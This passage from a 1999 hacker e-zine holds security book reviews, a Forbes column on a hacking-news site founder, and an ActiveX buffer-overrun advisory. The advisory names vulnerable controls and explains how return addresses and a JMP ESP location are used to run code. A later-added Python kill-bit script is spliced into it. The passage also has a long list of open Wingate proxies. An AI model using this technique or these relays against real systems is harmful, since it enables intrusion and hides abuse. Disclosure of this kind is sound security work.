Divided into five sections, the stage is set in the book's first chapter on security fundamentals. Cautioning against a slapdash approach, the authors offer pointers on developing and implementing a security policy for your organization. Heavily promoted is Cisco's Authentication, Authorization, and Accounting (AAA) security framework. Authentication lets you identify your users, authorization lets you decide what they can and can't have access to, and accounting lets you know what processes users are running and how much of the network's resources they are consuming. Cisco's team maintains that the AAA system forces you to keep a tight rein on your network, ultimately resulting in a more secure environment.

- Cryptography and Network Security : Principles and Practice -

KEY BENEFIT: This book presents detailed coverage of network security technology, the standards that are being developed for security in an internetworking environment, and the practical issues involved in developing security applications. KEY TOPICS: Opening with a tutorial and survey on network security technology, Stallings provides a sound mathematical foundation for developing the algorithms and results that are the cornerstone of network security.
Each basic building block of network security is covered, including conventional and public-key cryptography, authentication, and digital signatures, as are methods for countering hackers and other intruders and viruses. The balance of the book is devoted to an insightful and thorough discussion of all the latest important network security applications, including PGP, PEM, Kerberos, and SNMPv2 security. Now in its Second Edition, the book has been completely updated, reflecting the latest developments in the field.

- Internet Security : Professional Reference -

Internet Security covers far more material than most other books on the subject, but--inevitably--in less depth. You'll find chapters on daemons, Unix-to-Unix copy (UUCP), audit trails, spoofing and sniffing, SATAN, Kerberos, encryption and PGP, Java, CGI, and viruses. Encompassing such a broad range of material in detail is risky, and this book suffers from several gaps. For example, the subject of electronic commerce goes untouched, with no mention of payment-specific schemes such as CyberCash or protocols such as Secure Electronic Transaction (SET). For those topics that are included, the level of depth varies considerably: Some topics are covered by well-written overviews, others by listing the programs' parameters in excruciating detail, and still others by simplistic tutorials that seem out of place in a technical volume. In addition, there are topics such as encryption, which are scattered across many sections.
i got multitasking skills so i am sex0ring and chatting at the same time
copyright (c) SLa5H, member of HWA.hax0r.news

@HWA

15.0 Forbidden Knowledge #7 is being released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[15:50] FK7 haz da following 1nph0z3: Summary of the new telecommunications act, Windows NT low level security features and how they interact with virtual memory and process management, Use and Abuse of offline internet access services, Defeating portscan detection, An introduction to using gawk, Some serious commentary on the government and on the hacking scene, A Mass Fake Portscanner, A Mass CGI Vulnerability Scanner with Wingate Support, A PortSentry Scanner and more...

@HWA

16.0 The 'real' story behind JP and PSS as per Forbes magazine...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Via PSS
http://www.forbes.com/columnists/penenberg/

Go ahead and sue!

IT'S A SAD FACT, but whenever someone is cited as an expert in one publication, he is almost sure to be quoted in another--and another and another. The reason is simple: The first thing a journalist does when beginning a story is to see what else has been written on the topic. Culling sources from other news articles is a good way to get started. The problem is, few reporters check out these "experts," figuring that if a source made it into, say, The New York Times or The Washington Post, he must be reliable and, well, expert.

Think of it as an extension of Howard Stern's media strategy. Stern once said he himself first coined the term "King of All Media," figuring that the mainstream press would then start to call him that. (It did.)

How else to explain the schizophrenic emergence of twenty-year-old John Vranesevich, founder and operator of antionline.com, a web site that purports to follow the hacker scene. In the realm of mass media, "JP" has become a star, a youthful public figure who has been quoted extensively for his computer-security expertise and inside knowledge of the hacking world.
But in hacker circles he is a pariah. Perhaps only his close ally, Carolyn Meinel (a.k.a. "The Happy Hacker"), inspires more vitriol. At this year's Defcon, the hacker conference held in Las Vegas, Meinel had the dubious honor of being bodily ejected from the convention hall.

It's hard to gauge just how elite JP's hacker and computer-security skills are. But we do know his web site was taken down in August when someone with an account in Russia tricked AntiOnline into downloading software that redirected its visitors to another site. The hacker, obviously not a fan of JP's, included this message: "Expensive security systems do not protect from stupidity."

And online columnist Lew Koch, of CyberWire Dispatch, interviewed JP at length, exposing vast gaps of knowledge. For instance, Koch questioned JP about AntiOnline's alleged scoop of the hack of an atomic research center last year, yet he couldn't remember which country housed the center. JP kept insisting it was Israel, and, according to Koch, called the Bombay Atomic Research Center the "B'Hadvah Atomic Research Center." When Koch corrected him, JP admitted it must have been India. JP also claims he has "semi-contractual" relationships with NASA and the Defense Information Systems Agency (DISA), yet Koch says both agencies deny this.

But the mass media appears ignorant of this. The New York Times turned to Vranesevich when it needed comment on a rash of anti-government hacks, while The Wall Street Journal Europe dubbed him an "online-security specialist." The Baltimore Sun asked for his opinion on the hack of the Johns Hopkins medical school site. The Orange County Register invited him to bash hacker/martyr Kevin Mitnick, which he did with glee, saying that hackers don't have a clue about Mitnick's case, they "just heard it's cool to support Mitnick, and that is what they do." And the San Diego Union-Tribune dialed him up to ask about the threat of computer viruses.

Of course, JP has nothing against good press.
It's the bad press that lets him unsheathe his sharpest weapon. No, not the facts; those would only get in the way. We're talking about the threat of a lawsuit.

In June, JP contacted Harvard University to complain about a computer-security web site rival called PacketStorm, which had posted some nasty pictures, along with even nastier commentary. Harvard, afraid of a lawsuit, pulled the site, which was a favorite of computer-security professionals. JP claims on his web site that he didn't explicitly threaten a lawsuit, but the University certainly took it that way. A Harvard spokesman told me this was the first time Harvard had ever pulled the plug on a site for "objectionable material." (Eventually, PacketStorm found a home with Kroll-O'Gara, the big-time detective agency in New York.)

Then in July, The Ottawa Citizen ran a story about JP, reporting allegations that JP is under investigation by the FBI for "employing hackers to target high-profile sites in order to scoop the rest of the media with exclusive reporting." Vranesevich contacted the newspaper and threatened to sue. Although Mark Anderson, The Citizen's high tech editor, said he was confident in the story, the FBI would not comment whether it was in fact investigating JP or not, even though several other sources in the know insisted he was. As a result, the Citizen removed the story from its web site, rather than face a potential lawsuit.

"It's sad," Anderson says. "You're confident you have reliable information, but the threat of a lawsuit forces you to pull your story. The onus was on us to prove that Vranesevich is under investigation by the FBI, but the FBI wouldn't say it outright. Since Canadian libel law is tougher than American libel law, we felt we had no choice."

In addition, folks trolling around cyberspace say that Vranesevich has threatened them with lawsuits whenever they post anything negative about him on their web sites.
I wonder what he would do if someone actually took him up on this, since lawyers are expensive and, by all accounts, JP's business is far from being a cash cow. Perhaps, after reading this, he'll even sue me.

@HWA

17.0 ActiveX Buffer Overruns Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer: I'm not responsible for anything, unless it's good.

This advisory outlines several buffer overruns in several controls, and the vulnerability of ActiveX controls to buffer overrun attacks in general. It appears that the ActiveX/OLE/COM technology in general does no buffer checks before passing parameters to controls, leaving the checking up to the control in question. Hence, many poorly written controls are individually susceptible to buffer overrun attacks, independent of the environment they are controlled from and of other controls on the system.

The following controls are probably just a few of the vulnerable controls which are in common use, including one control from a third party vendor (Adobe). Because these controls are marked as safe for scripting, they may be exploited through IE through a web page, E-mail, or anywhere else where 'safe' ActiveX controls may be scripted (i.e. some newsgroup readers and other E-mail clients).

Known Affected Controls:

Acrobat Control for ActiveX     - PDF.OCX       v1.3.188
Setupctl 1.0 Type Library       - SETUPCTL.DLL  v1, 1, 0, 6
EYEDOG OLE Control module       - EYEDOG.OCX    v1.1.1.75
MSN ActiveX Setup BBS Control   - SETUPBBS.OCX  v4.71.0.10
hhopen OLE Control Module       - HHOPEN.OCX    v1, 0, 0, 1
RegWizCtrl 1.0 Type Library     - REGWIZC.DLL   v3, 0, 0, 0

Each control contains at least one method which does incorrect handling of strings, and when manipulating a string too large, a classic buffer overrun can occur, allowing arbitrary code to be executed on the client.

Protection:

Microsoft was notified of these exploits around a month ago, and is releasing a patch to revoke the hhopen, regwiz and setupctl controls, and a previous patch has been released for Eyedog.
For the other controls, and any others found to be vulnerable, see Microsoft knowledge base article Q240797 on how to stop an ActiveX control from running in IE. If pain persists, disable ActiveX scripting altogether in IE.

How to Stop an ActiveX Control from Running in Internet Explorer
http://support.microsoft.com/support/kb/articles/q240/7/97.asp

Details:

For each exploit, we have full control of the RET address; knowing where to RET to in order to execute our code is easier for some controls than others. For the controls where no known fixed or referenced location of the code can be found, I will simply RET to ExitProcess, although it is still possible, but more difficult, to execute arbitrary code. For the exploits where it is easy to RET to the code, I will demonstrate how to execute a program (CALC.EXE) using fixed API locations in Win98; you will need to modify these addresses depending on the versions in use.

For the exploits, similar to a couple of other Win exploits, a JMP ESP is required to get to the code. I didn't manage to find one in Kernel32 or IExplore, however there does appear to be one in Shell32 (version 4.72.3110.6) at (7FD035EB); you will also need to modify this address depending on your version. So if you get a crash at around this address, then it is most likely possible to run the exploit, the address just needs to be changed. It should be noted that arbitrary code may be executed, not just running a program; this is just an example.

Also, I haven't tried posting HTML to this forum before, so hopefully it will turn out ok; if not, could the moderators please convert the HTML to plaintext or something.

============================================================

EYEDOG:

With this control, MSInfoLoadFile is the offending method. There is no easy way to RET to our code, so instead, I have shown how to simply RET to ExitProcess directly. This will cause the host to terminate.
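As an added example (not the advisory's own code) of the mitigation the Protection section points to, the script below writes a REGEDIT4 file that sets the kill bit (Compatibility Flags 0x400 under the ActiveX Compatibility key, the mechanism Q240797 describes) for a list of CLSIDs, and audits an exported copy of that key to report which controls are actually blocked; the CLSIDs are placeholders, since the advisory names the controls by file and version only, and the function names are assumptions.

```python
"""Added example: write and audit the IE "kill bit" for ActiveX controls.
Setting Compatibility Flags to 0x400 under the ActiveX Compatibility key stops
IE from instantiating a control, so a vulnerable control stays blocked even
if it is left installed on the system."""
import re
from typing import Dict, Iterable

KILL_BIT = 0x00000400
COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
              r"\ActiveX Compatibility")
CLSID_RE = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.I)

# Placeholder CLSIDs (constructed): the advisory lists file names and versions,
# so the real CLSID of each control has to be read from its own registration.
PLACEHOLDER_CLSIDS = [
    "{11111111-2222-3333-4444-555555555555}",
    "{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}",
]


def killbit_reg(clsids: Iterable[str]) -> str:
    """Return REGEDIT4 text that sets the kill bit on every CLSID given.
    Malformed CLSIDs are rejected rather than written as a key that blocks
    nothing."""
    lines = ["REGEDIT4", ""]
    for clsid in clsids:
        if not CLSID_RE.match(clsid):
            raise ValueError(f"not a CLSID: {clsid!r}")
        lines += [f"[{COMPAT_KEY}\\{clsid.upper()}]",
                  f'"Compatibility Flags"=dword:{KILL_BIT:08x}',
                  ""]
    return "\r\n".join(lines)


def killbit_status(reg_text: str) -> Dict[str, bool]:
    """Parse an exported .reg of the compatibility key and report, per CLSID,
    whether the kill bit is set. A CLSID key with no Compatibility Flags
    value, or with flags lacking bit 0x400, counts as not blocked."""
    status: Dict[str, bool] = {}
    current = None
    prefix = COMPAT_KEY.lower() + "\\"
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            current = None
            if path.lower().startswith(prefix):
                current = path[len(prefix):].upper()
                status.setdefault(current, False)
        elif current and line.lower().startswith('"compatibility flags"=dword:'):
            flags = int(line.split("dword:", 1)[1].strip(), 16)
            status[current] = bool(flags & KILL_BIT)
    return status


# Constructed export, shaped like regedit's output, with one blocked control
# and one whose flags were cleared again.
SAMPLE_EXPORT = "\r\n".join([
    "REGEDIT4",
    "",
    f"[{COMPAT_KEY}\\{PLACEHOLDER_CLSIDS[0]}]",
    '"Compatibility Flags"=dword:00000400',
    "",
    f"[{COMPAT_KEY}\\{PLACEHOLDER_CLSIDS[1]}]",
    '"Compatibility Flags"=dword:00000000',
    "",
])

if __name__ == "__main__":
    print(killbit_reg(PLACEHOLDER_CLSIDS))
    for clsid, blocked in killbit_status(SAMPLE_EXPORT).items():
        print(clsid, "blocked" if blocked else "NOT blocked")
```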
============================================================

HHOPEN:

This control is a little more difficult to exploit, as the RET address is in the middle of the string, and once again there is no easy way to RET to our code, so I have RET'd to ExitProcess directly instead. In this case, OpenHelp is the vulnerable method, and the exploit is possible when the method is called with a valid help file and a long Help Section.

============================================================

SETUPBBS:

When this control is initialised, it will display a prompt notifying the user that the control is capable of modifying Mail and News configuration etc. and asks the user whether he/she wishes the control to proceed. This control is exploitable through two different methods, vAddNewsServer and bIsNewsServerConfigured. I have simply RET'd to ExitProcess with this exploit, although there are other possibilities.

============================================================

PDF:

This control from Adobe Acrobat can be exploited through the setview method, and because ESP points to the address after the RET address, we can place arbitrary code at this point and JMP to it by RET'ing to a JMP ESP, in this case one found in Shell32. The code simply executes CALC.EXE then calls ExitProcess to terminate the host without it crashing. I have attempted to notify Adobe of the issue, however they don't appear to have any form of direct secure@ address.

============================================================

SETUPCTL:

Apparently a control that was once used for the IE update web site, which is no longer in use, although it should still exist on a lot of systems. With this exploit, similar to the PDF exploit, ESP points to our code so we simply RET to the same JMP ESP in Shell32. Also, this exploit differs in that we set a property first (DistUnit) with the long string, then call the method (InstallNow).
Again, I have simply demonstrated how to execute CALC.EXE, though any code can be executed.

============================================================

REGWIZC:

The Registration Wizard control used by Microsoft to register MS products also contains a buffer overrun in the 'InvokeRegWizard' method. When called with a long string, pre-pended with '/i', we can gain control of the RET address and exploit the control in a similar manner as the PDF control. This exploit will cause a 'Regwiz.log' file to be created in the temporary directory, and once again will execute CALC.EXE and terminate the host.

============================================================

Sorry for the length of this advisory, but as there are several exploits, and probably many more, it was necessary. It should be noted that not only MS ActiveX controls are susceptible, but also many other vendors' controls. I cannot possibly go through all the controls which are available to the public, but the controls which are installed by default on most systems are obviously the most serious.

-Shane Hird
First year IT student at QUT, Brisbane, Australia.

Sponsors?

18.0 CyberArmy: Wingates list
~~~~~~~~~~~~~~~~~~~~~~~~

Some are bad, some are good, some are undoubtedly phishes or traps; buyer beware. These are posted here as always with no strings; they come from a third party and are posted in order for you to make sure YOU aren't on this list!
[latency: 10/01/99 13:00:20 PDT by Ivan Dimitrov] 198.247.215.1 [latency: 09/30/99 15:02:12 PDT] mh.gymnaziumtu.cz [latency: 09/30/99 13:21:22 PDT by sandoc] 210.114.231.130 [latency: 09/30/99 13:18:59 PDT by sandoc] 210.56.18.225 [latency: 09/30/99 13:16:33 PDT by sandoc] pen22755-1.gw.connect.com.au [latency: 09/30/99 13:14:19 PDT by sandoc] cix.abaco.edu.pe [latency: 09/30/99 13:09:37 PDT by sandoc] note.ark.ne.jp [latency: 09/30/99 13:07:40 PDT by sandoc] 208.5.13.15 [latency: 09/30/99 13:05:23 PDT by sandoc] 203.135.2.188 [latency: 09/30/99 13:01:51 PDT by sandoc] 193.227.185.190 [latency: 09/30/99 12:59:35 PDT by sandoc] 194.204.205.127 [latency: 09/30/99 12:58:22 PDT by sandoc] 193.227.181.144 [latency: 09/30/99 12:55:20 PDT by sandoc] 200.230.120.133 [latency: 09/30/99 12:53:51 PDT by sandoc] 194.75.255.156 [latency: 09/29/99 10:19:20 PDT by sandoc] infou429.jet.es [latency: 09/29/99 10:18:13 PDT by sandoc] 212.252.66.206 [latency: 09/29/99 10:16:50 PDT by sandoc] 203.197.208.36 [latency: 09/29/99 10:15:07 PDT by sandoc] 216.226.197.179 [latency: 09/29/99 10:05:53 PDT by sandoc] chaus.ozemail.com.au [latency: 09/29/99 10:04:12 PDT by sandoc] maodcfm.egat.or.th [latency: 09/29/99 10:01:24 PDT by sandoc] 200.46.20.185 [latency: 09/29/99 09:56:02 PDT by sandoc] 195.249.229.4 [latency: 09/29/99 09:53:20 PDT by sandoc] sscoin.com [latency: 09/29/99 09:47:10 PDT by sandoc] proxy.cyberg.it [latency: 09/29/99 08:46:47 PDT by aaa] 195.182.171.121 [latency: 09/29/99 05:27:51 PDT by Bi0Sk|lleR] whois.internic.net [latency: 09/28/99 10:57:58 PDT] 200.42.146.150 [latency: 09/28/99 10:03:10 PDT by sandoc] 203.197.9.162 [latency: 09/28/99 09:56:20 PDT by sandoc] mail.tbccorp.com [latency: 09/28/99 09:54:59 PDT by sandoc] MF2-1-036.mgfairfax.rr.com [latency: 09/28/99 09:48:25 PDT by sandoc] 195.146.98.226 [latency: 09/28/99 09:34:37 PDT by sandoc] 202.186.134.6 [latency: 09/28/99 04:30:26 PDT by B Wang] 207.139.234.203 [latency: 09/27/99 20:54:19 PDT by monster] 
radna-gw.supermedia.pl [latency: 09/27/99 20:30:25 PDT] DONT.WRITE. BULLSHIT.HERE [latency: 09/27/99 19:22:09 PDT by abed] 209.21.14.65 [latency: 09/27/99 13:40:26 PDT by sandoc] 192.117.8.253 [latency: 09/27/99 13:38:27 PDT by sandoc] 192.106.117.25 [latency: 09/27/99 13:35:07 PDT by sandoc] 212.68.152.3 [latency: 09/27/99 13:33:46 PDT by sandoc] 194.73.125.69 [latency: 09/27/99 13:29:42 PDT by sandoc] sie-home-1-7.urbanet.ch [latency: 09/27/99 13:09:32 PDT by sandoc] neptune.sunlink.net [latency: 09/27/99 08:51:15 PDT by Juxtaposition] 24.1.3.125 [latency: 09/27/99 08:32:57 PDT by Juxtaposition] 24.1.4.116 [latency: 09/27/99 08:31:56 PDT by Juxtaposition] sherlock.ibi.co.za [latency: 09/26/99 15:44:34 PDT by Juxtaposition] 207.50.228.163 [latency: 09/26/99 10:19:37 PDT by sandoc] 193.15.241.21 [latency: 09/26/99 10:10:53 PDT by sandoc] 194.25.204.29 [latency: 09/26/99 10:09:24 PDT by sandoc] 207.229.47.11 [latency: 09/26/99 10:08:00 PDT by sandoc] 205.237.210.214 [latency: 09/26/99 10:06:38 PDT by sandoc] c30-169.the-bridge.net [latency: 09/26/99 09:59:18 PDT by sandoc] 38.30.155.88 [latency: 09/25/99 21:17:05 PDT by Jame] 152.169.201.156 [latency: 09/25/99 20:23:48 PDT] 24.112.84.102 [latency: 09/25/99 13:11:04 PDT by BLaZeR u Newbie!] 24.112.84.94 [latency: 09/25/99 13:10:23 PDT by BLaZeR u NeWb! 
H] mail.trikotazas.lt [latency: 09/25/99 12:08:31 PDT by babysuk] 209.183.86.96 [latency: 09/25/99 11:11:55 PDT by Shogo] 206.103.12.131 [latency: 09/25/99 10:41:41 PDT by sandoc] proxy01.faboro.ch [latency: 09/25/99 10:36:49 PDT by sandoc] pc1.expansion.com.mx [latency: 09/25/99 10:36:06 PDT by sandoc] 207.3.122.85 [latency: 09/25/99 10:33:38 PDT by sandoc] radna-gw.supermedia.pl [latency: 09/25/99 10:29:52 PDT by sandoc] 202.135.160.10 [latency: 09/25/99 10:28:57 PDT by sandoc] gateway.eltjanst.se [latency: 09/25/99 10:26:13 PDT by sandoc] ns.holonic.co.jp [latency: 09/25/99 10:24:57 PDT by sandoc] 203.101.1.22 [latency: 09/25/99 10:23:18 PDT by sandoc] 163.121.200.72 [latency: 09/25/99 10:13:01 PDT] 195.216.48.13 [latency: 09/25/99 06:42:29 PDT] 24.112.84.93 [latency: 09/24/99 23:50:43 PDT by U R DEAD ZASZ U FAG] 24.112.97.9 [latency: 09/24/99 23:39:29 PDT by BLaZeR] 210.237.183.226 [latency: 09/24/99 20:55:02 PDT by ~TG|{~ZaSz] 200.210.15.188 [latency: 09/24/99 20:54:40 PDT by ZaSz] 24.226.156.214 [latency: 09/24/99 20:54:20 PDT by ZaSz] 202.21.8.31 [latency: 09/24/99 20:54:07 PDT by ZaSz] 202.21.8.21 [latency: 09/24/99 20:53:54 PDT by ~TG|{~ZaSz] 200.210.15.166 [latency: 09/24/99 20:53:34 PDT by ZaSz] 139.142.170.233 [latency: 09/24/99 20:53:22 PDT by ZaSz] 24.30.53.10 [latency: 09/24/99 20:53:10 PDT by ZaSz] 24.30.109.224 [latency: 09/24/99 20:52:44 PDT by ZaSz] 24.0.233.86 [latency: 09/24/99 20:52:34 PDT by ZaSz] 200.255.107.140 [latency: 09/24/99 20:52:11 PDT by ZaSz] 200.36.8.103 [latency: 09/24/99 20:51:56 PDT by ZaSz] 200.38.211.242 [latency: 09/24/99 20:51:42 PDT by ZaSz] 200.38.211.253 [latency: 09/24/99 20:51:24 PDT by ZaSz] 200.38.211.246 [latency: 09/24/99 20:51:10 PDT by ZaSz] 210.169.139.161 [latency: 09/24/99 20:50:59 PDT by ZaSz] 210.226.69.210 [latency: 09/24/99 20:50:48 PDT by ZaSz] 209.251.71.115 [latency: 09/24/99 20:50:30 PDT by ZaSz] 24.0.79.151 [latency: 09/24/99 20:50:18 PDT by ZaSz] 24.0.79.40 [latency: 09/24/99 20:50:05 PDT by ZaSz] 
24.4.27.2 [latency: 09/24/99 20:49:49 PDT by ZaSz] 207.102.5.161 [latency: 09/24/99 20:49:36 PDT by ZaSz] 207.102.5.162 [latency: 09/24/99 20:49:21 PDT by ZaSz] 210.164.86.34 [latency: 09/24/99 20:49:06 PDT by ZaSz] 195.67.1.34 [latency: 09/24/99 20:48:12 PDT by ZaSz] 195.216.48.36 [latency: 09/24/99 20:47:54 PDT by ZaSz] 195.216.48.30 [latency: 09/24/99 20:47:41 PDT by ZaSz] 195.216.48.13 [latency: 09/24/99 20:47:24 PDT by ZaSz] 210.226.82.162 [latency: 09/24/99 20:47:06 PDT by ZaSz] 200.13.19.218 [latency: 09/24/99 20:46:51 PDT by ZaSz] 200.13.19.213 [latency: 09/24/99 20:46:36 PDT by ZaSz] 200.13.19.181 [latency: 09/24/99 20:46:21 PDT by ZaSz] 200.13.19.141 [latency: 09/24/99 20:46:08 PDT by ZaSz] 200.13.19.76 [latency: 09/24/99 20:45:55 PDT by ZaSz] 200.13.19.33 [latency: 09/24/99 20:45:43 PDT by ~TG|{~ZaSz] 195.182.171.121 [latency: 09/24/99 20:45:21 PDT by ZaSz] 24.112.39.232 [latency: 09/24/99 20:43:14 PDT by ZaSz] 24.2.29.54 [latency: 09/24/99 20:41:41 PDT by ZaSz] 24.112.75.210 [latency: 09/24/99 20:41:30 PDT by ZaSz] 24.112.7.143 [latency: 09/24/99 20:41:18 PDT by ZaSz] 24.93.15.248 [latency: 09/24/99 20:41:05 PDT by ZaSz] 24.64.210.14 [latency: 09/24/99 20:40:52 PDT by ZaSz] 24.112.167.186 [latency: 09/24/99 20:40:36 PDT by ZaSz] 203.102.199.109 [latency: 09/24/99 20:40:13 PDT by ZaSz] 210.161.200.82 [latency: 09/24/99 20:39:55 PDT by ZaSz] 207.102.5.162 [latency: 09/24/99 20:39:42 PDT by ZaSz] 207.102.5.161 [latency: 09/24/99 20:39:26 PDT by ZaSz] 203.102.199.209 [latency: 09/24/99 20:39:15 PDT by ZaSz] 203.102.199.186 [latency: 09/24/99 20:39:02 PDT by ZaSz] 203.102.199.72 [latency: 09/24/99 20:38:51 PDT by ZaSz] 203.102.199.21 [latency: 09/24/99 20:38:40 PDT by ZaSz] 203.102.199.22 [latency: 09/24/99 20:38:16 PDT by ZaSz] 203.102.199.11 [latency: 09/24/99 20:38:03 PDT by ZaSz] 209.165.135.138 [latency: 09/24/99 20:37:53 PDT by ZaSz] 216.72.47.33 [latency: 09/24/99 20:37:36 PDT by ZaSz] 216.72.47.18 [latency: 09/24/99 20:37:23 PDT by ZaSz] 216.72.47.16 
[latency: 09/24/99 20:37:08 PDT by ZaSz] 216.72.47.12 [latency: 09/24/99 20:36:51 PDT by ~TG|{~ZaSz = ZaSz] 216.72.47.8 [latency: 09/24/99 20:36:14 PDT by ZaSz] 216.72.47.4 [latency: 09/24/99 20:36:01 PDT by ZaSz] 209.4.68.50 [latency: 09/24/99 20:35:44 PDT by ZaSz] 200.38.211.253 [latency: 09/24/99 20:35:32 PDT by ZaSz] 200.38.211.251 [latency: 09/24/99 20:35:08 PDT by ZaSz] 200.38.211.240 [latency: 09/24/99 20:34:49 PDT by ZaSz] 200.38.211.226 [latency: 09/24/99 20:34:37 PDT by ZaSz] 200.38.211.239 [latency: 09/24/99 20:34:18 PDT by ZaSz] 209.144.19.86 [latency: 09/24/99 20:34:05 PDT by ZaSz] 206.141.48.2 [latency: 09/24/99 20:33:53 PDT by ZaSz] 24.93.51.131 [latency: 09/24/99 20:33:33 PDT by ~TG|{~ZaSz] irc.dm.net.lb [latency: 09/24/99 14:22:40 PDT by Devil] DONT.WRITE. BULLSHIT.HERE [latency: 09/24/99 14:18:49 PDT by Devil] 156-21.dr.cgocable.ca [latency: 09/24/99 14:14:50 PDT by Devil] 209.198.248.139 [latency: 09/24/99 14:12:11 PDT by Devil] hs.state.az.us [latency: 09/24/99 14:11:23 PDT by Devil] 207.225.232.5 [latency: 09/24/99 13:18:41 PDT by sandoc] 212.252.147.144 [latency: 09/24/99 13:14:59 PDT by sandoc] 195.87.12.110 [latency: 09/24/99 13:04:21 PDT by sandoc] 195.14.129.129 [latency: 09/24/99 13:01:58 PDT by sandoc] 193.192.109.139 [latency: 09/24/99 13:00:46 PDT by sandoc] 194.204.240.157 [latency: 09/24/99 12:58:33 PDT by sandoc] 212.252.15.80 [latency: 09/24/99 12:54:30 PDT by sandoc] 212.252.149.99 [latency: 09/24/99 12:52:36 PDT by sandoc] ar5-120i.dial-up.arnes.si [latency: 09/24/99 12:50:01 PDT by sandoc] cuscon1658.tstt.net.tt [latency: 09/24/99 12:48:49 PDT by sandoc] host029210.ciudad.com.ar [latency: 09/24/99 12:46:36 PDT by sandoc] 202.213.244.234 [latency: 09/24/99 12:40:07 PDT by sandoc] asy26.as01.sol1.superonline.com [latency: 09/24/99 12:34:37 PDT by sandoc] 207.158.108.99 [latency: 09/24/99 12:32:59 PDT by sandoc] 212.33.193.146 [latency: 09/24/99 12:30:45 PDT by sandoc] cableweb.w3.to [latency: 09/23/99 20:03:23 PDT] 
ppp-15-78.cyberia.net.lb [latency: 09/23/99 13:43:06 PDT by sandoc] flammen.aof.no [latency: 09/23/99 13:41:38 PDT by sandoc] eta.riosoft.softex.br [latency: 09/23/99 13:40:05 PDT by sandoc] Pelican.CITY.UniSA.edu.au [latency: 09/23/99 13:37:07 PDT by sandoc] server1.wingsink.com [latency: 09/23/99 13:34:13 PDT by sandoc] mail.jgboswell.com [latency: 09/23/99 13:32:42 PDT by sandoc] 210.136.60.2 [latency: 09/23/99 13:31:36 PDT by sandoc] 210.145.140.245 [latency: 09/23/99 13:30:02 PDT by sandoc] dc.com.pl [latency: 09/23/99 13:27:43 PDT by sandoc] Tuva-Tcms17.krs.ru [latency: 09/23/99 13:26:13 PDT by sandoc] impexcabmet.LL.sl.ru [latency: 09/23/99 13:24:09 PDT by sandoc] proxy.cyberg.it [latency: 09/23/99 13:15:29 PDT by sandoc] 194.79.101.94 [latency: 09/23/99 13:13:27 PDT by sandoc] ns.bibliodata.net [latency: 09/23/99 13:11:38 PDT by sandoc] 194.213.239.19 [latency: 09/23/99 13:06:55 PDT by sandoc] server.tf.ITB.ac.id [latency: 09/23/99 13:04:38 PDT by sandoc] 212.133.139.3 [latency: 09/23/99 12:56:08 PDT by sandoc] 207.3.122.85 [latency: 09/23/99 12:54:12 PDT by sandoc] 210.237.183.226 [latency: 09/23/99 12:52:56 PDT by sandoc] dciserver.twfrierson.com [latency: 09/23/99 12:51:52 PDT by sandoc] as3-54.gto.net.om [latency: 09/23/99 12:48:46 PDT by sandoc] tirith.mngt.waikato.ac.nz [latency: 09/23/99 12:46:50 PDT by sandoc] ABD708E3.ipt.aol.com [latency: 09/23/99 12:45:24 PDT by sandoc] sil.am [latency: 09/23/99 11:40:39 PDT by [0uTw0rLd]] hs.state.az.us [latency: 09/22/99 20:34:48 PDT] 141.216.41.247 [latency: 09/22/99 11:38:31 PDT] 195.182.171.121 [latency: 09/22/99 07:17:12 PDT by N1C] chat.groovy.gr [latency: 09/21/99 13:46:58 PDT by aqile] 24.137.18.44 [latency: 09/21/99 13:44:00 PDT] 195.122.112.11 [latency: 09/21/99 12:39:54 PDT by bebhlos] cableweb.w3.to [latency: 09/21/99 03:59:56 PDT] 208.184.64.1 [latency: 09/20/99 16:14:28 PDT] 202.21.8.21 [latency: 09/20/99 10:43:21 PDT] yes...i do mind [latency: 09/20/99 10:17:07 PDT by b33sh] 202.21.8.21 [latency: 
09/20/99 09:13:42 PDT] do u mind...if i fuck u? [latency: 09/20/99 06:42:48 PDT] 202.21.8.171 [latency: 09/19/99 22:12:08 PDT by 0ct4g0n0] 200.210.15.178 [latency: 09/19/99 04:32:31 PDT by SeA^g|R|_] proxy.amtvl.com [latency: 09/19/99 03:15:31 PDT] ns.devp.org [latency: 09/19/99 03:12:16 PDT] Hacker.Com [latency: 09/19/99 03:11:08 PDT] 205.230.60.56 [latency: 09/18/99 19:32:00 PDT by #OP - DALnet - DIE] T.O.O.H_Inc. [latency: 09/18/99 16:30:29 PDT] 203.243.123.14 [latency: 09/18/99 14:48:57 PDT by SeA^g|R|_] 207.242.80.66 [latency: 09/18/99 08:06:36 PDT by #SocketS/MSNr3db|00d] 207.236.55.231 [latency: 09/18/99 07:59:41 PDT by r3db|00d] 206.132.179.167 [latency: 09/18/99 07:20:02 PDT by SeA^g|R|_] thunder.jpl.nasa.gov [latency: 09/18/99 02:59:45 PDT by ThUnDeR] 24.226.156.21 [latency: 09/17/99 06:54:23 PDT by kamel] Telezimex.ro [latency: 09/16/99 23:46:52 PDT by Kamel] rs.internic.net [latency: 09/16/99 14:13:22 PDT by Kick DALnet Ass!!!] 202.21.8.21 [latency: 09/15/99 23:35:14 PDT by turbobeaver] is.theshit.and.your.a.lammah.com [latency: 09/15/99 07:48:20 PDT by dEm0nL|T|0niSt] DAL.net.is.owned. [latency: 09/15/99 07:07:05 PDT by Anakin] ts1-32.gcc.cyberhighway.net [latency: 09/14/99 10:33:37 PDT by pit] dns.yoshinomasa.co.jp [latency: 09/14/99 10:30:04 PDT by Wolfen] P62.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 10:28:36 PDT by kusa] P59.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 00:01:34 PDT] ts1-32.gcc.cyberhighway.net [latency: 09/13/99 23:59:02 PDT] 200.210.15.178 [latency: 09/13/99 23:58:03 PDT]

@HWA

19.0 Internet Vigilantism A story so fantastic it just might be true...
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

